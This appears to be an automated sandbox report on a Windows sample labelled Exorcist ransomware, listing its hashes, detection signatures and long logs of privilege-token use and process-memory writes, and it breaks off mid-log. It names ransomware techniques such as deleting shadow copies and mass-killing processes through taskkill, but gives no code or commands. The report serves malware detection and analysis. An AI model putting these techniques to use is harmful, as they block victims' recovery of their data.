Analysis
-
max time kernel
116s -
max time network
151s -
platform
windows10_x64 -
resource
win10 -
submitted
24-07-2020 12:53
Static task
static1
Behavioral task
behavioral1
Sample
f188cf267d209a0209a25bda4bb75b86.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
f188cf267d209a0209a25bda4bb75b86.exe
Resource
win10
General
-
Target
f188cf267d209a0209a25bda4bb75b86.exe
-
Size
43KB
-
MD5
f188cf267d209a0209a25bda4bb75b86
-
SHA1
3ef4c199d1b5187784f4d709ab8e1cc6901716e8
-
SHA256
027d99aaaa6803a07d07ce0ba1fa66964388129d3b26dcf8621a3310692b0a61
-
SHA512
abe64e07cb279dad66df081d0f374f2948fec444872f09fb968de6b74848414ab354c27598475d919d8a48670e4b42a75eadd6392a550fb727d8422324a9c535
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 129 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3852 WMIC.exe Token: SeSecurityPrivilege 3852 WMIC.exe Token: SeTakeOwnershipPrivilege 3852 WMIC.exe Token: SeLoadDriverPrivilege 3852 WMIC.exe Token: SeSystemProfilePrivilege 3852 WMIC.exe Token: SeSystemtimePrivilege 3852 WMIC.exe Token: SeProfSingleProcessPrivilege 3852 WMIC.exe Token: SeIncBasePriorityPrivilege 3852 WMIC.exe Token: SeCreatePagefilePrivilege 3852 WMIC.exe Token: SeBackupPrivilege 3852 WMIC.exe Token: SeRestorePrivilege 3852 WMIC.exe Token: SeShutdownPrivilege 3852 WMIC.exe Token: SeDebugPrivilege 3852 WMIC.exe Token: SeSystemEnvironmentPrivilege 3852 WMIC.exe Token: SeRemoteShutdownPrivilege 3852 WMIC.exe Token: SeUndockPrivilege 3852 WMIC.exe Token: SeManageVolumePrivilege 3852 WMIC.exe Token: 33 3852 WMIC.exe Token: 34 3852 WMIC.exe Token: 35 3852 WMIC.exe Token: 36 3852 WMIC.exe Token: SeIncreaseQuotaPrivilege 3852 WMIC.exe Token: SeSecurityPrivilege 3852 WMIC.exe Token: SeTakeOwnershipPrivilege 3852 WMIC.exe Token: SeLoadDriverPrivilege 3852 WMIC.exe Token: SeSystemProfilePrivilege 3852 WMIC.exe Token: SeSystemtimePrivilege 3852 WMIC.exe Token: SeProfSingleProcessPrivilege 3852 WMIC.exe Token: SeIncBasePriorityPrivilege 3852 WMIC.exe Token: SeCreatePagefilePrivilege 3852 WMIC.exe Token: SeBackupPrivilege 3852 WMIC.exe Token: SeRestorePrivilege 3852 WMIC.exe Token: SeShutdownPrivilege 3852 WMIC.exe Token: SeDebugPrivilege 3852 WMIC.exe Token: SeSystemEnvironmentPrivilege 3852 WMIC.exe Token: SeRemoteShutdownPrivilege 3852 WMIC.exe Token: SeUndockPrivilege 3852 WMIC.exe Token: SeManageVolumePrivilege 3852 WMIC.exe Token: 33 3852 WMIC.exe Token: 34 3852 WMIC.exe Token: 35 3852 WMIC.exe Token: 36 3852 WMIC.exe Token: SeBackupPrivilege 3312 vssvc.exe Token: SeRestorePrivilege 3312 vssvc.exe Token: SeAuditPrivilege 3312 vssvc.exe Token: SeDebugPrivilege 2996 taskkill.exe Token: SeDebugPrivilege 3952 taskkill.exe Token: SeDebugPrivilege 1864 taskkill.exe Token: SeDebugPrivilege 412 taskkill.exe Token: SeDebugPrivilege 2084 taskkill.exe Token: SeDebugPrivilege 3716 taskkill.exe Token: SeDebugPrivilege 1160 taskkill.exe Token: SeDebugPrivilege 3720 taskkill.exe Token: SeDebugPrivilege 3852 taskkill.exe Token: SeDebugPrivilege 2992 taskkill.exe Token: SeDebugPrivilege 1484 taskkill.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 2600 taskkill.exe Token: SeDebugPrivilege 3728 taskkill.exe Token: SeDebugPrivilege 3812 taskkill.exe Token: SeDebugPrivilege 1876 taskkill.exe Token: SeDebugPrivilege 3208 taskkill.exe Token: SeDebugPrivilege 1064 taskkill.exe Token: SeDebugPrivilege 1320 taskkill.exe Token: SeDebugPrivilege 1484 taskkill.exe Token: SeDebugPrivilege 2728 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 2268 taskkill.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 3708 taskkill.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 4036 taskkill.exe Token: SeDebugPrivilege 2408 taskkill.exe Token: SeDebugPrivilege 2260 taskkill.exe Token: SeDebugPrivilege 980 taskkill.exe Token: SeDebugPrivilege 1680 taskkill.exe Token: SeDebugPrivilege 1760 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 3720 taskkill.exe Token: SeDebugPrivilege 1212 taskkill.exe Token: SeDebugPrivilege 2780 taskkill.exe Token: SeDebugPrivilege 912 taskkill.exe Token: SeDebugPrivilege 1008 taskkill.exe Token: SeDebugPrivilege 1644 taskkill.exe Token: SeDebugPrivilege 3756 taskkill.exe Token: SeDebugPrivilege 1780 taskkill.exe Token: SeDebugPrivilege 396 taskkill.exe Token: SeDebugPrivilege 1156 taskkill.exe Token: SeDebugPrivilege 2664 taskkill.exe Token: SeDebugPrivilege 3528 taskkill.exe Token: SeDebugPrivilege 1476 taskkill.exe Token: SeDebugPrivilege 2068 taskkill.exe Token: SeDebugPrivilege 3644 taskkill.exe Token: SeDebugPrivilege 2980 taskkill.exe Token: SeDebugPrivilege 3704 taskkill.exe Token: SeDebugPrivilege 2268 taskkill.exe Token: SeDebugPrivilege 1148 taskkill.exe Token: SeDebugPrivilege 1928 taskkill.exe Token: SeDebugPrivilege 3708 taskkill.exe Token: SeDebugPrivilege 1708 taskkill.exe Token: SeDebugPrivilege 1608 taskkill.exe Token: SeDebugPrivilege 344 taskkill.exe Token: SeDebugPrivilege 2788 taskkill.exe Token: SeDebugPrivilege 2156 taskkill.exe Token: SeDebugPrivilege 3096 taskkill.exe Token: SeDebugPrivilege 2256 taskkill.exe Token: SeDebugPrivilege 2600 taskkill.exe Token: SeDebugPrivilege 3716 taskkill.exe Token: SeDebugPrivilege 4016 taskkill.exe Token: SeDebugPrivilege 3824 taskkill.exe Token: SeDebugPrivilege 3968 taskkill.exe Token: SeDebugPrivilege 2992 taskkill.exe Token: SeDebugPrivilege 2968 taskkill.exe Token: SeDebugPrivilege 2596 taskkill.exe Token: SeDebugPrivilege 2708 taskkill.exe Token: SeDebugPrivilege 3984 taskkill.exe Token: SeDebugPrivilege 3092 taskkill.exe Token: SeDebugPrivilege 3728 taskkill.exe Token: SeDebugPrivilege 520 taskkill.exe Token: SeDebugPrivilege 1196 taskkill.exe Token: SeDebugPrivilege 3936 taskkill.exe Token: SeDebugPrivilege 3788 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 4060 taskkill.exe Token: SeDebugPrivilege 904 taskkill.exe Token: SeDebugPrivilege 2128 taskkill.exe Token: SeDebugPrivilege 404 taskkill.exe Token: SeDebugPrivilege 492 taskkill.exe -
Modifies service 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2728 vssadmin.exe -
Exorcist
Ransomware-as-a-service which avoids infecting machines in CIS nations. First seen in mid-2020.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Suspicious use of WriteProcessMemory 552 IoCs
description pid Process procid_target PID 3544 wrote to memory of 3864 3544 f188cf267d209a0209a25bda4bb75b86.exe 68 PID 3544 wrote to memory of 3864 3544 f188cf267d209a0209a25bda4bb75b86.exe 68 PID 3544 wrote to memory of 3864 3544 f188cf267d209a0209a25bda4bb75b86.exe 68 PID 3864 wrote to memory of 3852 3864 cmd.exe 70 PID 3864 wrote to memory of 3852 3864 cmd.exe 70 PID 3864 wrote to memory of 3852 3864 cmd.exe 70 PID 3544 wrote to memory of 3184 3544 f188cf267d209a0209a25bda4bb75b86.exe 73 PID 3544 wrote to memory of 3184 3544 f188cf267d209a0209a25bda4bb75b86.exe 73 PID 3544 wrote to memory of 3184 3544 f188cf267d209a0209a25bda4bb75b86.exe 73 PID 3544 wrote to memory of 2956 3544 f188cf267d209a0209a25bda4bb75b86.exe 75 PID 3544 wrote to memory of 2956 3544 f188cf267d209a0209a25bda4bb75b86.exe 75 PID 3544 wrote to memory of 2956 3544 f188cf267d209a0209a25bda4bb75b86.exe 75 PID 3544 wrote to memory of 3984 3544 f188cf267d209a0209a25bda4bb75b86.exe 77 PID 3544 wrote to memory of 3984 3544 f188cf267d209a0209a25bda4bb75b86.exe 77 PID 3544 wrote to memory of 3984 3544 f188cf267d209a0209a25bda4bb75b86.exe 77 PID 3544 wrote to memory of 4036 3544 f188cf267d209a0209a25bda4bb75b86.exe 79 PID 3544 wrote to memory of 4036 3544 f188cf267d209a0209a25bda4bb75b86.exe 79 PID 3544 wrote to memory of 4036 3544 f188cf267d209a0209a25bda4bb75b86.exe 79 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 81 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 81 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 81 PID 2824 wrote to memory of 2728 2824 cmd.exe 83 PID 2824 wrote to memory of 2728 2824 cmd.exe 83 PID 2824 wrote to memory of 2728 2824 cmd.exe 83 PID 3544 wrote to memory of 3632 3544 f188cf267d209a0209a25bda4bb75b86.exe 84 PID 3544 wrote to memory of 3632 3544 f188cf267d209a0209a25bda4bb75b86.exe 84 PID 3544 wrote to memory of 3632 3544 f188cf267d209a0209a25bda4bb75b86.exe 84 PID 3544 wrote to memory of 3732 3544 f188cf267d209a0209a25bda4bb75b86.exe 86 PID 3544 wrote to memory of 3732 3544 f188cf267d209a0209a25bda4bb75b86.exe 86 PID 3544 wrote to memory of 3732 3544 f188cf267d209a0209a25bda4bb75b86.exe 86 PID 3732 wrote to memory of 2996 3732 cmd.exe 88 PID 3732 wrote to memory of 2996 3732 cmd.exe 88 PID 3732 wrote to memory of 2996 3732 cmd.exe 88 PID 3544 wrote to memory of 3800 3544 f188cf267d209a0209a25bda4bb75b86.exe 90 PID 3544 wrote to memory of 3800 3544 f188cf267d209a0209a25bda4bb75b86.exe 90 PID 3544 wrote to memory of 3800 3544 f188cf267d209a0209a25bda4bb75b86.exe 90 PID 3800 wrote to memory of 3952 3800 cmd.exe 92 PID 3800 wrote to memory of 3952 3800 cmd.exe 92 PID 3800 wrote to memory of 3952 3800 cmd.exe 92 PID 3544 wrote to memory of 2968 3544 f188cf267d209a0209a25bda4bb75b86.exe 93 PID 3544 wrote to memory of 2968 3544 f188cf267d209a0209a25bda4bb75b86.exe 93 PID 3544 wrote to memory of 2968 3544 f188cf267d209a0209a25bda4bb75b86.exe 93 PID 2968 wrote to memory of 1864 2968 cmd.exe 95 PID 2968 wrote to memory of 1864 2968 cmd.exe 95 PID 2968 wrote to memory of 1864 2968 cmd.exe 95 PID 3544 wrote to memory of 856 3544 f188cf267d209a0209a25bda4bb75b86.exe 96 PID 3544 wrote to memory of 856 3544 f188cf267d209a0209a25bda4bb75b86.exe 96 PID 3544 wrote to memory of 856 3544 f188cf267d209a0209a25bda4bb75b86.exe 96 PID 856 wrote to memory of 412 856 cmd.exe 98 PID 856 wrote to memory of 412 856 cmd.exe 98 PID 856 wrote to memory of 412 856 cmd.exe 98 PID 3544 wrote to memory of 2644 3544 f188cf267d209a0209a25bda4bb75b86.exe 99 PID 3544 wrote to memory of 2644 3544 f188cf267d209a0209a25bda4bb75b86.exe 99 PID 3544 wrote to memory of 2644 3544 f188cf267d209a0209a25bda4bb75b86.exe 99 PID 2644 wrote to memory of 2084 2644 cmd.exe 101 PID 2644 wrote to memory of 2084 2644 cmd.exe 101 PID 2644 wrote to memory of 2084 2644 cmd.exe 101 PID 3544 wrote to memory of 492 3544 f188cf267d209a0209a25bda4bb75b86.exe 102 PID 3544 wrote to memory of 492 3544 f188cf267d209a0209a25bda4bb75b86.exe 102 PID 3544 wrote to memory of 492 3544 f188cf267d209a0209a25bda4bb75b86.exe 102 PID 492 wrote to memory of 3716 492 cmd.exe 104 PID 492 wrote to memory of 3716 492 cmd.exe 104 PID 492 wrote to memory of 3716 492 cmd.exe 104 PID 3544 wrote to memory of 392 3544 f188cf267d209a0209a25bda4bb75b86.exe 105 PID 3544 wrote to memory of 392 3544 f188cf267d209a0209a25bda4bb75b86.exe 105 PID 3544 wrote to memory of 392 3544 f188cf267d209a0209a25bda4bb75b86.exe 105 PID 392 wrote to memory of 1160 392 cmd.exe 107 PID 392 wrote to memory of 1160 392 cmd.exe 107 PID 392 wrote to memory of 1160 392 cmd.exe 107 PID 3544 wrote to memory of 496 3544 f188cf267d209a0209a25bda4bb75b86.exe 108 PID 3544 wrote to memory of 496 3544 f188cf267d209a0209a25bda4bb75b86.exe 108 PID 3544 wrote to memory of 496 3544 f188cf267d209a0209a25bda4bb75b86.exe 108 PID 496 wrote to memory of 3720 496 cmd.exe 110 PID 496 wrote to memory of 3720 496 cmd.exe 110 PID 496 wrote to memory of 3720 496 cmd.exe 110 PID 3544 wrote to memory of 1212 3544 f188cf267d209a0209a25bda4bb75b86.exe 111 PID 3544 wrote to memory of 1212 3544 f188cf267d209a0209a25bda4bb75b86.exe 111 PID 3544 wrote to memory of 1212 3544 f188cf267d209a0209a25bda4bb75b86.exe 111 PID 1212 wrote to memory of 3852 1212 cmd.exe 113 PID 1212 wrote to memory of 3852 1212 cmd.exe 113 PID 1212 wrote to memory of 3852 1212 cmd.exe 113 PID 3544 wrote to memory of 1320 3544 f188cf267d209a0209a25bda4bb75b86.exe 114 PID 3544 wrote to memory of 1320 3544 f188cf267d209a0209a25bda4bb75b86.exe 114 PID 3544 wrote to memory of 1320 3544 f188cf267d209a0209a25bda4bb75b86.exe 114 PID 1320 wrote to memory of 2992 1320 cmd.exe 116 PID 1320 wrote to memory of 2992 1320 cmd.exe 116 PID 1320 wrote to memory of 2992 1320 cmd.exe 116 PID 3544 wrote to memory of 2968 3544 f188cf267d209a0209a25bda4bb75b86.exe 117 PID 3544 wrote to memory of 2968 3544 f188cf267d209a0209a25bda4bb75b86.exe 117 PID 3544 wrote to memory of 2968 3544 f188cf267d209a0209a25bda4bb75b86.exe 117 PID 2968 wrote to memory of 1484 2968 cmd.exe 119 PID 2968 wrote to memory of 1484 2968 cmd.exe 119 PID 2968 wrote to memory of 1484 2968 cmd.exe 119 PID 3544 wrote to memory of 3092 3544 f188cf267d209a0209a25bda4bb75b86.exe 120 PID 3544 wrote to memory of 3092 3544 f188cf267d209a0209a25bda4bb75b86.exe 120 PID 3544 wrote to memory of 3092 3544 f188cf267d209a0209a25bda4bb75b86.exe 120 PID 3092 wrote to memory of 912 3092 cmd.exe 122 PID 3092 wrote to memory of 912 3092 cmd.exe 122 PID 3092 wrote to memory of 912 3092 cmd.exe 122 PID 3544 wrote to memory of 980 3544 f188cf267d209a0209a25bda4bb75b86.exe 123 PID 3544 wrote to memory of 980 3544 f188cf267d209a0209a25bda4bb75b86.exe 123 PID 3544 wrote to memory of 980 3544 f188cf267d209a0209a25bda4bb75b86.exe 123 PID 980 wrote to memory of 2600 980 cmd.exe 125 PID 980 wrote to memory of 2600 980 cmd.exe 125 PID 980 wrote to memory of 2600 980 cmd.exe 125 PID 3544 wrote to memory of 1680 3544 f188cf267d209a0209a25bda4bb75b86.exe 126 PID 3544 wrote to memory of 1680 3544 f188cf267d209a0209a25bda4bb75b86.exe 126 PID 3544 wrote to memory of 1680 3544 f188cf267d209a0209a25bda4bb75b86.exe 126 PID 1680 wrote to memory of 3728 1680 cmd.exe 128 PID 1680 wrote to memory of 3728 1680 cmd.exe 128 PID 1680 wrote to memory of 3728 1680 cmd.exe 128 PID 3544 wrote to memory of 1760 3544 f188cf267d209a0209a25bda4bb75b86.exe 129 PID 3544 wrote to memory of 1760 3544 f188cf267d209a0209a25bda4bb75b86.exe 129 PID 3544 wrote to memory of 1760 3544 f188cf267d209a0209a25bda4bb75b86.exe 129 PID 1760 wrote to memory of 3812 1760 cmd.exe 131 PID 1760 wrote to memory of 3812 1760 cmd.exe 131 PID 1760 wrote to memory of 3812 1760 cmd.exe 131 PID 3544 wrote to memory of 396 3544 f188cf267d209a0209a25bda4bb75b86.exe 132 PID 3544 wrote to memory of 396 3544 f188cf267d209a0209a25bda4bb75b86.exe 132 PID 3544 wrote to memory of 396 3544 f188cf267d209a0209a25bda4bb75b86.exe 132 PID 396 wrote to memory of 1876 396 cmd.exe 134 PID 396 wrote to memory of 1876 396 cmd.exe 134 PID 396 wrote to memory of 1876 396 cmd.exe 134 PID 3544 wrote to memory of 1156 3544 f188cf267d209a0209a25bda4bb75b86.exe 135 PID 3544 wrote to memory of 1156 3544 f188cf267d209a0209a25bda4bb75b86.exe 135 PID 3544 wrote to memory of 1156 3544 f188cf267d209a0209a25bda4bb75b86.exe 135 PID 1156 wrote to memory of 3208 1156 cmd.exe 137 PID 1156 wrote to memory of 3208 1156 cmd.exe 137 PID 1156 wrote to memory of 3208 1156 cmd.exe 137 PID 3544 wrote to memory of 3816 3544 f188cf267d209a0209a25bda4bb75b86.exe 138 PID 3544 wrote to memory of 3816 3544 f188cf267d209a0209a25bda4bb75b86.exe 138 PID 3544 wrote to memory of 3816 3544 f188cf267d209a0209a25bda4bb75b86.exe 138 PID 3816 wrote to memory of 1064 3816 cmd.exe 140 PID 3816 wrote to memory of 1064 3816 cmd.exe 140 PID 3816 wrote to memory of 1064 3816 cmd.exe 140 PID 3544 wrote to memory of 3528 3544 f188cf267d209a0209a25bda4bb75b86.exe 141 PID 3544 wrote to memory of 3528 3544 f188cf267d209a0209a25bda4bb75b86.exe 141 PID 3544 wrote to memory of 3528 3544 f188cf267d209a0209a25bda4bb75b86.exe 141 PID 3528 wrote to memory of 1320 3528 cmd.exe 143 PID 3528 wrote to memory of 1320 3528 cmd.exe 143 PID 3528 wrote to memory of 1320 3528 cmd.exe 143 PID 3544 wrote to memory of 2068 3544 f188cf267d209a0209a25bda4bb75b86.exe 144 PID 3544 wrote to memory of 2068 3544 f188cf267d209a0209a25bda4bb75b86.exe 144 PID 3544 wrote to memory of 2068 3544 f188cf267d209a0209a25bda4bb75b86.exe 144 PID 2068 wrote to memory of 1484 2068 cmd.exe 146 PID 2068 wrote to memory of 1484 2068 cmd.exe 146 PID 2068 wrote to memory of 1484 2068 cmd.exe 146 PID 3544 wrote to memory of 412 3544 f188cf267d209a0209a25bda4bb75b86.exe 147 PID 3544 wrote to memory of 412 3544 f188cf267d209a0209a25bda4bb75b86.exe 147 PID 3544 wrote to memory of 412 3544 f188cf267d209a0209a25bda4bb75b86.exe 147 PID 412 wrote to memory of 2728 412 cmd.exe 149 PID 412 wrote to memory of 2728 412 cmd.exe 149 PID 412 wrote to memory of 2728 412 cmd.exe 149 PID 3544 wrote to memory of 408 3544 f188cf267d209a0209a25bda4bb75b86.exe 150 PID 3544 wrote to memory of 408 3544 f188cf267d209a0209a25bda4bb75b86.exe 150 PID 3544 wrote to memory of 408 3544 f188cf267d209a0209a25bda4bb75b86.exe 150 PID 408 wrote to memory of 2460 408 cmd.exe 152 PID 408 wrote to memory of 2460 408 cmd.exe 152 PID 408 wrote to memory of 2460 408 cmd.exe 152 PID 3544 wrote to memory of 2056 3544 f188cf267d209a0209a25bda4bb75b86.exe 153 PID 3544 wrote to memory of 2056 3544 f188cf267d209a0209a25bda4bb75b86.exe 153 PID 3544 wrote to memory of 2056 3544 f188cf267d209a0209a25bda4bb75b86.exe 153 PID 2056 wrote to memory of 2268 2056 cmd.exe 155 PID 2056 wrote to memory of 2268 2056 cmd.exe 155 PID 2056 wrote to memory of 2268 2056 cmd.exe 155 PID 3544 wrote to memory of 1676 3544 f188cf267d209a0209a25bda4bb75b86.exe 156 PID 3544 wrote to memory of 1676 3544 f188cf267d209a0209a25bda4bb75b86.exe 156 PID 3544 wrote to memory of 1676 3544 f188cf267d209a0209a25bda4bb75b86.exe 156 PID 1676 wrote to memory of 1148 1676 cmd.exe 158 PID 1676 wrote to memory of 1148 1676 cmd.exe 158 PID 1676 wrote to memory of 1148 1676 cmd.exe 158 PID 3544 wrote to memory of 1740 3544 f188cf267d209a0209a25bda4bb75b86.exe 159 PID 3544 wrote to memory of 1740 3544 f188cf267d209a0209a25bda4bb75b86.exe 159 PID 3544 wrote to memory of 1740 3544 f188cf267d209a0209a25bda4bb75b86.exe 159 PID 1740 wrote to memory of 1928 1740 cmd.exe 161 PID 1740 wrote to memory of 1928 1740 cmd.exe 161 PID 1740 wrote to memory of 1928 1740 cmd.exe 161 PID 3544 wrote to memory of 1876 3544 f188cf267d209a0209a25bda4bb75b86.exe 162 PID 3544 wrote to memory of 1876 3544 f188cf267d209a0209a25bda4bb75b86.exe 162 PID 3544 wrote to memory of 1876 3544 f188cf267d209a0209a25bda4bb75b86.exe 162 PID 1876 wrote to memory of 3708 1876 cmd.exe 164 PID 1876 wrote to memory of 3708 1876 cmd.exe 164 PID 1876 wrote to memory of 3708 1876 cmd.exe 164 PID 3544 wrote to memory of 3208 3544 f188cf267d209a0209a25bda4bb75b86.exe 165 PID 3544 wrote to memory of 3208 3544 f188cf267d209a0209a25bda4bb75b86.exe 165 PID 3544 wrote to memory of 3208 3544 f188cf267d209a0209a25bda4bb75b86.exe 165 PID 3208 wrote to memory of 3900 3208 cmd.exe 167 PID 3208 wrote to memory of 3900 3208 cmd.exe 167 PID 3208 wrote to memory of 3900 3208 cmd.exe 167 PID 3544 wrote to memory of 1392 3544 f188cf267d209a0209a25bda4bb75b86.exe 168 PID 3544 wrote to memory of 1392 3544 f188cf267d209a0209a25bda4bb75b86.exe 168 PID 3544 wrote to memory of 1392 3544 f188cf267d209a0209a25bda4bb75b86.exe 168 PID 1392 wrote to memory of 1212 1392 cmd.exe 170 PID 1392 wrote to memory of 1212 1392 cmd.exe 170 PID 1392 wrote to memory of 1212 1392 cmd.exe 170 PID 3544 wrote to memory of 1888 3544 f188cf267d209a0209a25bda4bb75b86.exe 171 PID 3544 wrote to memory of 1888 3544 f188cf267d209a0209a25bda4bb75b86.exe 171 PID 3544 wrote to memory of 1888 3544 f188cf267d209a0209a25bda4bb75b86.exe 171 PID 1888 wrote to memory of 1400 1888 cmd.exe 173 PID 1888 wrote to memory of 1400 1888 cmd.exe 173 PID 1888 wrote to memory of 1400 1888 cmd.exe 173 PID 3544 wrote to memory of 3596 3544 f188cf267d209a0209a25bda4bb75b86.exe 174 PID 3544 wrote to memory of 3596 3544 f188cf267d209a0209a25bda4bb75b86.exe 174 PID 3544 wrote to memory of 3596 3544 f188cf267d209a0209a25bda4bb75b86.exe 174 PID 3596 wrote to memory of 2848 3596 cmd.exe 176 PID 3596 wrote to memory of 2848 3596 cmd.exe 176 PID 3596 wrote to memory of 2848 3596 cmd.exe 176 PID 3544 wrote to memory of 584 3544 f188cf267d209a0209a25bda4bb75b86.exe 177 PID 3544 wrote to memory of 584 3544 f188cf267d209a0209a25bda4bb75b86.exe 177 PID 3544 wrote to memory of 584 3544 f188cf267d209a0209a25bda4bb75b86.exe 177 PID 584 wrote to memory of 4036 584 cmd.exe 179 PID 584 wrote to memory of 4036 584 cmd.exe 179 PID 584 wrote to memory of 4036 584 cmd.exe 179 PID 3544 wrote to memory of 1916 3544 f188cf267d209a0209a25bda4bb75b86.exe 180 PID 3544 wrote to memory of 1916 3544 f188cf267d209a0209a25bda4bb75b86.exe 180 PID 3544 wrote to memory of 1916 3544 f188cf267d209a0209a25bda4bb75b86.exe 180 PID 1916 wrote to memory of 2408 1916 cmd.exe 182 PID 1916 wrote to memory of 2408 1916 cmd.exe 182 PID 1916 wrote to memory of 2408 1916 cmd.exe 182 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 183 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 183 PID 3544 wrote to memory of 2824 3544 f188cf267d209a0209a25bda4bb75b86.exe 183 PID 2824 wrote to memory of 2260 2824 cmd.exe 185 PID 2824 wrote to memory of 2260 2824 cmd.exe 185 PID 2824 wrote to memory of 2260 2824 cmd.exe 185 PID 3544 wrote to memory of 3240 3544 f188cf267d209a0209a25bda4bb75b86.exe 186 PID 3544 wrote to memory of 3240 3544 f188cf267d209a0209a25bda4bb75b86.exe 186 PID 3544 wrote to memory of 3240 3544 f188cf267d209a0209a25bda4bb75b86.exe 186 PID 3240 wrote to memory of 980 3240 cmd.exe 188 PID 3240 wrote to memory of 980 3240 cmd.exe 188 PID 3240 wrote to memory of 980 3240 cmd.exe 188 PID 3544 wrote to memory of 1164 3544 f188cf267d209a0209a25bda4bb75b86.exe 189 PID 3544 wrote to memory of 1164 3544 f188cf267d209a0209a25bda4bb75b86.exe 189 PID 3544 wrote to memory of 1164 3544 f188cf267d209a0209a25bda4bb75b86.exe 189 PID 1164 wrote to memory of 1680 1164 cmd.exe 191 PID 1164 wrote to memory of 1680 1164 cmd.exe 191 PID 1164 wrote to memory of 1680 1164 cmd.exe 191 PID 3544 wrote to memory of 1912 3544 f188cf267d209a0209a25bda4bb75b86.exe 192 PID 3544 wrote to memory of 1912 3544 f188cf267d209a0209a25bda4bb75b86.exe 192 PID 3544 wrote to memory of 1912 3544 f188cf267d209a0209a25bda4bb75b86.exe 192 PID 1912 wrote to memory of 1760 1912 cmd.exe 194 PID 1912 wrote to memory of 1760 1912 cmd.exe 194 PID 1912 wrote to memory of 1760 1912 cmd.exe 194 PID 3544 wrote to memory of 4068 3544 f188cf267d209a0209a25bda4bb75b86.exe 195 PID 3544 wrote to memory of 4068 3544 f188cf267d209a0209a25bda4bb75b86.exe 195 PID 3544 wrote to memory of 4068 3544 f188cf267d209a0209a25bda4bb75b86.exe 195 PID 4068 wrote to memory of 1868 4068 cmd.exe 197 PID 4068 wrote to memory of 1868 4068 cmd.exe 197 PID 4068 wrote to memory of 1868 4068 cmd.exe 197 PID 3544 wrote to memory of 2956 3544 f188cf267d209a0209a25bda4bb75b86.exe 198 PID 3544 wrote to memory of 2956 3544 f188cf267d209a0209a25bda4bb75b86.exe 198 PID 3544 wrote to memory of 2956 3544 f188cf267d209a0209a25bda4bb75b86.exe 198 PID 2956 wrote to memory of 3720 2956 cmd.exe 200 PID 2956 wrote to memory of 3720 2956 cmd.exe 200 PID 2956 wrote to memory of 3720 2956 cmd.exe 200 PID 3544 wrote to memory of 3816 3544 f188cf267d209a0209a25bda4bb75b86.exe 201 PID 3544 wrote to memory of 3816 3544 f188cf267d209a0209a25bda4bb75b86.exe 201 PID 3544 wrote to memory of 3816 3544 f188cf267d209a0209a25bda4bb75b86.exe 201 PID 3816 wrote to memory of 1212 3816 cmd.exe 203 PID 3816 wrote to memory of 1212 3816 cmd.exe 203 PID 3816 wrote to memory of 1212 3816 cmd.exe 203 PID 3544 wrote to memory of 1400 3544 f188cf267d209a0209a25bda4bb75b86.exe 204 PID 3544 wrote to memory of 1400 3544 f188cf267d209a0209a25bda4bb75b86.exe 204 PID 3544 wrote to memory of 1400 3544 f188cf267d209a0209a25bda4bb75b86.exe 204 PID 1400 wrote to memory of 2780 1400 cmd.exe 206 PID 1400 wrote to memory of 2780 1400 cmd.exe 206 PID 1400 wrote to memory of 2780 1400 cmd.exe 206 PID 3544 wrote to memory of 3596 3544 f188cf267d209a0209a25bda4bb75b86.exe 207 PID 3544 wrote to memory of 3596 3544 f188cf267d209a0209a25bda4bb75b86.exe 207 PID 3544 wrote to memory of 3596 3544 f188cf267d209a0209a25bda4bb75b86.exe 207 PID 3596 wrote to memory of 912 3596 cmd.exe 209 PID 3596 wrote to memory of 912 3596 cmd.exe 209 PID 3596 wrote to memory of 912 3596 cmd.exe 209 PID 3544 wrote to memory of 1468 3544 f188cf267d209a0209a25bda4bb75b86.exe 210 PID 3544 wrote to memory of 1468 3544 f188cf267d209a0209a25bda4bb75b86.exe 210 PID 3544 wrote to memory of 1468 3544 f188cf267d209a0209a25bda4bb75b86.exe 210 PID 1468 wrote to memory of 1008 1468 cmd.exe 212 PID 1468 wrote to memory of 1008 1468 cmd.exe 212 PID 1468 wrote to memory of 1008 1468 cmd.exe 212 PID 3544 wrote to memory of 2116 3544 f188cf267d209a0209a25bda4bb75b86.exe 213 PID 3544 wrote to memory of 2116 3544 f188cf267d209a0209a25bda4bb75b86.exe 213 PID 3544 wrote to memory of 2116 3544 f188cf267d209a0209a25bda4bb75b86.exe 213 PID 2116 wrote to memory of 1644 2116 cmd.exe 215 PID 2116 wrote to memory of 1644 2116 cmd.exe 215 PID 2116 wrote to memory of 1644 2116 cmd.exe 215 PID 3544 wrote to memory of 2600 3544 f188cf267d209a0209a25bda4bb75b86.exe 216 PID 3544 wrote to memory of 2600 3544 f188cf267d209a0209a25bda4bb75b86.exe 216 PID 3544 wrote to memory of 2600 3544 f188cf267d209a0209a25bda4bb75b86.exe 216 PID 2600 wrote to memory of 3756 2600 cmd.exe 218 PID 2600 wrote to memory of 3756 2600 cmd.exe 218 PID 2600 wrote to memory of 3756 2600 cmd.exe 218 PID 3544 wrote to memory of 3716 3544 